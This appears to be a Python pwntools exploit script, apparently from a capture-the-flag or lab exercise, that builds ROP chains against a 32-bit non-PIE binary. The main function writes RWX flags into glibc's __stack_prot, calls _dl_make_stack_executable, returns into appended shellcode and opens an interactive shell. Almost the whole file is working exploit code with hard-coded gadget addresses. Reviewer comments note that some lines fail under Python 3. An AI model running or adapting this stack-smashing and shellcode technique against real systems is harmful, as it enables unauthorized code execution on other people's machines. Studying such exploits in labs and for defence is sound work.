def build_payload() -> bytes:
    """Assemble the single input line that carries the ROP chain.

    Relies on the module-level BINARY_PATH, BINARY_FUNCTIONS and
    LAST_ROP_ADDRESS. The leading ``4\\n`` (presumably a menu choice of the
    target -- confirm against the binary) and the 120-byte filler that
    reaches the saved return address are taken as given; every function in
    BINARY_FUNCTIONS is called in order and LAST_ROP_ADDRESS is appended raw.

    Returns:
        The complete payload as bytes, newline-terminated.
    """
    chain = ROP(BINARY_PATH)
    for target_fn in BINARY_FUNCTIONS:
        chain.call(target_fn)
    chain.raw(LAST_ROP_ADDRESS)

    # Same byte layout as concatenation: selector, filler, chain, terminator.
    parts = (b'4\n', b'A' * 120, bytes(chain), b'\n')
    return b''.join(parts)
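def setRegisters(elf, registers: dict):
    """Build a ROP chain that loads *registers* ({reg_name: value}) from *elf*.

    For every ``(value, gadget)`` pair that ``ROP.setRegisters`` resolves to a
    ``pwnlib.rop.gadgets.Gadget``, the gadget address is emitted followed by
    one raw stack word per entry in ``gadget.regs``: the requested value for
    registers present in *registers*, ``0`` for any other register the gadget
    touches. Pairs that are not ``Gadget`` objects are skipped, as before.

    Args:
        elf: the binary (pwn ``ELF``) to harvest gadgets from.
        registers: mapping of register name to the value to load.

    Returns:
        The populated ``pwn.ROP`` object.
    """
    from pwn import ROP
    rop = ROP(elf)
    for _value, gadget in rop.setRegisters(registers):
        # isinstance instead of type(...) == ...: subclasses of Gadget also
        # count, and it is the idiomatic check.
        if not isinstance(gadget, pwnlib.rop.gadgets.Gadget):
            continue
        rop.raw(gadget.address)
        for reg in gadget.regs:
            # Registers we do not care about are padded with 0.
            rop.raw(registers.get(reg, 0))
    return rop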
def main() -> None:
    """Drive the exploit: flip the stack to RWX via ROP, then run the shellcode.

    The chain stores PROT_READ|PROT_WRITE|PROT_EXEC into glibc's
    ``__stack_prot``, calls ``_dl_make_stack_executable(&__libc_stack_end)``
    so the stack mapping becomes executable, and finally executes
    ``PUSH ESP; RET`` to land in the shellcode placed right after the chain.
    Every gadget address below is absolute and hand-picked for
    ``ExploitInfo.elf``; they are meaningless for any other build.
    """
    elf = ExploitInfo.elf
    # Both symbols are resolved from the target itself, which only works if
    # glibc is linked in statically -- presumably the case here; confirm.
    addr___libc_stack_end = elf.sym['__libc_stack_end']
    addr___stack_prot = elf.sym['__stack_prot']
    MEM_PROT_FLAG = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC

    # Gadget addresses. Absolute values like these imply a non-PIE binary
    # (verify with checksec); each one must be re-found if the binary changes.
    POP_EAX_RET = 0x80b81c6
    POP_EBX_RET = 0x80481c9
    POP_ECX_RET = 0x80de955
    POP_EDX_RET = 0x806f02a
    XOR_EAX_EAX_RET = 0x8049303
    INC_EAX_RET = 0x807a86f
    MOV_DWORD_EDX_EAX_RET = 0x80549db
    POP_ESI_RET = 0x8048433
    POP_EDI_RET = 0x8048480
    INT_80 = 0x806cc25
    PUSH_ESP_RET = 0x080b81d6

    rop = ROP(elf)
    rop.raw(POP_EDX_RET)
    rop.raw(addr___stack_prot)  # edx = &__stack_prot
    rop.raw(XOR_EAX_EAX_RET)

    # eax = MEM_PROT_FLAG: eax was zeroed above, then INC EAX is executed
    # once per unit of the flag (1|2|4 = 7 on Linux). Popping the value
    # directly would put 0x00000007 on the stack, whose NUL bytes the assert
    # below rejects.
    for x in range(MEM_PROT_FLAG):  # eax = MEM_PROT_FLAG
        rop.raw(INC_EAX_RET)

    rop.raw(MOV_DWORD_EDX_EAX_RET)  # __stack_prot = MEM_PROT_FLAG
    rop.raw(POP_EAX_RET)  #
    rop.raw(addr___libc_stack_end)  # eax = &__libc_stack_end
    rop.call('_dl_make_stack_executable'
             )  # _dl_make_stack_executable(&__libc_stack_end)
    # Return into the stack, i.e. into the shellcode appended after the chain.
    rop.raw(PUSH_ESP_RET)

    p = get_process()

    # str concatenation with rop.chain() only works if it returns str,
    # i.e. Python 2 pwntools; under Python 3 this raises TypeError -- TODO confirm.
    payload = 'A' * ExploitInfo.offset_eip
    payload += rop.chain()
    payload += ExploitInfo.shellcode_i386
    # NOTE(review): assert is stripped under -O; this sanity check (payload
    # must not be truncated by a NUL) would be safer as an explicit raise.
    assert ('\x00' not in payload)

    p.clean()
    log.info("Sending: %r", payload)
    p.sendline(payload)

    p.clean(timeout=0.5)

    # Second drain looks redundant; left as given.
    p.clean(timeout=0.5)
    log.success("Here are your shell!")
    p.sendline('ls -la')
    p.interactive()
    p.close()